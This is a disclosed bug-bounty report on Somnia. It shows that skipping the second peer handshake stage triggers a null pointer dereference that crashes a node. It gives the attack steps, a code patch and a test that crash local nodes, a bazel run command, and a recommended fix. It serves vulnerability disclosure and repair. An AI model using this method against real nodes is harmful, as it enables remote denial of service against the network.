'%3e%3cpath%20d='M12.4997%201.33325C10.39%201.33325%208.32772%201.95884%206.5736%203.13091C4.81947%204.30298%203.4523%205.96888%202.64496%207.91796C1.83763%209.86704%201.62639%2012.0118%202.03797%2014.0809C2.44955%2016.15%203.46545%2018.0506%204.95721%2019.5424C6.44897%2021.0342%208.34959%2022.0501%2010.4187%2022.4616C12.4878%2022.8732%2014.6326%2022.662%2016.5816%2021.8546C18.5307%2021.0473%2020.1966%2019.6801%2021.3687%2017.926C22.5408%2016.1719%2023.1663%2014.1096%2023.1663%2011.9999C23.1663%209.17094%2022.0425%206.45783%2020.0422%204.45745C18.0418%202.45706%2015.3287%201.33325%2012.4997%201.33325ZM12.4997%2021.3333C10.6537%2021.3333%208.84922%2020.7859%207.31436%2019.7603C5.7795%2018.7347%204.58322%2017.2771%203.8768%2015.5716C3.17039%2013.8662%202.98555%2011.9896%203.34568%2010.1791C3.70581%208.36859%204.59473%206.70554%205.90002%205.40025C7.20531%204.09496%208.86835%203.20605%2010.6788%202.84592C12.4893%202.48579%2014.3659%202.67063%2016.0714%203.37704C17.7768%204.08346%2019.2345%205.27974%2020.2601%206.8146C21.2856%208.34945%2021.833%2010.154%2021.833%2011.9999C21.833%2014.4753%2020.8497%2016.8492%2019.0993%2018.5996C17.349%2020.3499%2014.975%2021.3333%2012.4997%2021.3333Z'%20fill='white'/%3e%3cpath%20d='M19.167%208.06667C19.042%207.9425%2018.8731%207.8728%2018.697%207.8728C18.5208%207.8728%2018.3519%207.9425%2018.227%208.06667L10.8269%2015.4333L6.82695%2011.4333C6.70495%2011.3016%206.53562%2011.2237%206.35621%2011.2169C6.1768%2011.21%206.00201%2011.2747%205.87028%2011.3967C5.73856%2011.5187%205.66069%2011.688%205.65382%2011.8674C5.64694%2012.0468%205.71162%2012.2216%205.83362%2012.3533L10.8269%2017.3333L19.167%209.01333C19.2294%208.95136%2019.279%208.87762%2019.3129%208.79638C19.3467%208.71514%2019.3642%208.62801%2019.3642%208.54C19.3642%208.45199%2019.3467%208.36485%2019.3129%208.28361C19.279%208.20237%2019.2294%208.12864%2019.167%208.06667Z'%20fill='white'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_2790_31187'%3e%3crect%20width='24'%20height='24'%20fill='white'%20transform='translate(0.5)'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
Somnia Disclosed Report
Audit report Somnia Audit Contest Somnia - Node Crash via Null Pointer Dereference
Target
https://github.com/hackenproof-public/somnia
Vulnerability Details
Somnia - Node Crash via Null Pointer Dereference
Description
A critical vulnerability exists in the peer-to-peer handshake state machine that allows an attacker to crash any Somnia node through a deliberate null pointer dereference. This attack exploits insufficient state validation during the handshake completion phase, enabling remote denial of service attacks against individual nodes or the entire network.
Technical Analysis
Normal Handshake Flow
The peer-to-peer handshake protocol follows a strict three-stage sequence:
- SendChallengeHandshakeMessage: Initial challenge exchange and network ID verification
- RespondToChallengeHandshakeMessage: Challenge signature verification and peer identity establishment
- FinishedHandshakeMessage: Handshake completion confirmation and transition to payload mode
Each stage depends on successful completion of the previous stage, with the verified_peer_address field being populated during stage 2 when the peer's identity is cryptographically verified.
Vulnerability Root Cause
The handshake completion logic in FinishedHandshakeMessage processing contains insufficient state validation that fails to ensure the proper sequence of handshake stages.
This is the only validation:
// The peer is telling us they have finished the handshake (and have verified our
// address). All future messages will be payload.
if (incoming_handshake_state != IncomingHandshakeState::READY_TO_FINISH) {
// We were not expecting this.
return false;
}
Since incoming_handshake_state is set to READY_TO_FINISH during stage 1, the attacker can send a FinishedHandshakeMessage directly without completing stage 2.
This means that when verified_peer_address is read during stage 3, it will still be null, causing a segmentation fault when the node tries to dereference it:
spdlog::info("PeerNetwork successfully completed handshake with {}",
*verified_peer_address); // <- NULL DEREFERENCE
Attack Methodology
Step-by-Step Attack Flow
-
Connection Initiation
- Attacker establishes TCP connection to target Somnia node
- Normal handshake begins with challenge exchange
-
Stage 1 Completion
- Attacker sends
SendChallengeHandshakeMessagewith arbitrary challenge - Target node responds and sets
incoming_handshake_state = READY_TO_FINISH - Critical:
verified_peer_addressremains null (only set in stage 2)
- Attacker sends
-
Stage 2 Bypass
- Attacker deliberately skips
RespondToChallengeHandshakeMessage - No peer identity verification occurs
verified_peer_addressremains uninitialized (null)
- Attacker deliberately skips
-
Stage 3 Exploitation
- Attacker sends
FinishedHandshakeMessagedirectly - State validation passes:
incoming_handshake_state == READY_TO_FINISH - Logging code attempts to dereference null
verified_peer_address - Result: Segmentation fault and immediate node termination
- Attacker sends
Impact
Severity: Critical
This vulnerability enables remote denial of service attacks against Somnia nodes through a simple, low-resource attack vector. It allows an attacker to crash any node, resulting in a complete network shutdown.
Recommendation
Primary Fix: Enhanced State Validation
Implement comprehensive handshake state validation to ensure proper stage sequencing:
// In FinishedHandshakeMessage handler
if (incoming_handshake_state != IncomingHandshakeState::READY_TO_FINISH ||
outgoing_handshake_state != OutgoingHandshakeState::READY_TO_FINISH) {
return false;
}
Validation steps
Proof of Concept
Add the following check to the file peer_network.cc#L360:
if (HexStringToAddress("0x054a8494bea2c5251e70c3e8120138b21ab91193") != peer_network_transport.our_private_keys.GetAddress()) {
socket.Write(smash::SerialiseToVector<HandshakeMessage>(
RespondToChallengeHandshakeMessage{signature}));
}
We are using 0x054a8494bea2c5251e70c3e8120138b21ab91193 as the attacker node, so if we are the attacker, we should not send the RespondToChallengeHandshakeMessage.
Add the following test to demonstrate the attack to the file protocol_network_test.cc:
TEST_F(ProtocolNetworkTest, ProtocolNetworkNodeCrash) {
std::vector<std::unique_ptr<NodeActorManager>> nodes;
std::vector<crypto::PrivateKeys> keys;
std::vector<ChainParameters> params;
// Create 3 nodes: Attacker, Node A, Node B
for (int i = 0; i < 3; i++) {
keys.emplace_back(crypto::PrivateKeys::GenerateNonRandomKeys(1337 + i));
params.push_back(protocol_network_chain_parameters);
params[i].local_parameters.protocol_listen_port = 9051 + (i * 10);
params[i].local_parameters.data_listen_port = 9101 + (i * 10);
params[i].local_parameters.api_http_port = 9201 + (i * 10);
params[i].local_parameters.api_websocket_port = 9301 + (i * 10);
params[i].local_parameters.storage_database_directory =
fmt::format("/tmp/somnia_{}_{}", keys[i].GetAddress(), RandomHash());
nodes.emplace_back(std::make_unique<NodeActorManager>(params[i], keys[i], epoch_manager));
}
auto& main_network = nodes[0]->protocol_network.GetAsyncProtocolNetwork();
// Trigger the attack by connecting the attacker to both legitimate nodes
for (int i = 1; i < 3; i++) {
main_network.ConnectToPeer(keys[i].GetAddress(), "127.0.0." + std::to_string(i),
params[i].local_parameters.protocol_listen_port);
std::this_thread::sleep_for(std::chrono::milliseconds(100));
}
// Allow sufficient time for attack execution
std::this_thread::sleep_for(std::chrono::seconds(15));
}
Execution Instructions
bazel test --config no-avx -s //somnia/node:protocol_network_test --test_output=all --test_filter="ProtocolNetworkTest.*"
Note: Timing may need adjustment based on system performance and network conditions.
Expected Results
The test will crash the node.
Attachments
hidden 
Comments on this report are hidden 
Details 
Participants (2) 
